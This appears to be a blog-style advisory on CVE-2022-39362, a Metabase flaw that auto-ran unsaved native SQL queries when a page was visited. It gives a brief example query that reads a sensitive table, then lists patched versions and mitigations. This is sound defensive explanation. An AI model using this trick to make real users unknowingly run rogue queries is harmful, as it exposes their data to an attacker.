Metabase is a popular open-source data visualization software that allows users to easily explore, visualize, and share data. It has become a crucial tool for many businesses and organizations for making data-driven decisions. However, before the recent patches in versions .44.5, 1.44.5, .43.7, 1.43.7, .42.6, 1.42.6, .41.9, and 1.41.9, Metabase had an issue where unsaved SQL queries were automatically executed. This vulnerability could potentially be exploited by an attacker, leading to various unwanted consequences. In this post, we will dive into the exploit details, the patch provided by Metabase, and the suggested mitigations.

Exploit Details

Prior to the patched versions mentioned above, Metabase automatically executed unsaved SQL queries in its native editor. This auto-execution posed a possible attack vector where an attacker could craft a malicious query that could lead to unauthorized data access, data exfiltration, or even compromise the database. Here is a simple example showcasing the vulnerability:

SELECT * FROM sensitive_table WHERE 1=1; -- Auto-executes without user's consent

By merely visiting a Metabase page containing an ad-hoc unsaved native SQL query, the query would automatically run, and results would be displayed without the user's consent. This behavior could allow a malicious actor to trick someone into visiting the page and unintentionally executing the rogue query.

Original References

Metabase GitHub Repository: https://github.com/metabase/metabase

Metabase Patch Details: https://github.com/metabase/metabase/pull/23037

CVE-2022-39362 NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2022-39362

Patch and Mitigation

The vulnerability was addressed in Metabase versions .44.5, 1.44.5, .43.7, 1.43.7, .42.6, 1.42.6, .41.9, and 1.41.9, where the auto-execution behavior was disabled. Now, the native editor displays the query but requires the user to manually run it if they desire.

To mitigate this vulnerability, users of Metabase are advised to update their software to the latest patched version. If an update is not possible for some reason, users should avoid visiting untrusted Metabase pages and executing native SQL queries that have not been vetted.

Conclusion

Metabase has addressed the unsaved SQL queries auto-execution vulnerability in their latest patch, making the software more secure and reducing the attack surface for potential bad actors. Users should ensure they update to one of the patched versions to avoid the possible exploitation of this vulnerability. It is crucial for users to stay alert and exercise caution when dealing with unsaved native SQL queries to maintain the security and integrity of their data.

Timeline

Published on: 10/26/2022 19:15:00 UTC
Last modified on: 10/28/2022 16:45:00 UTC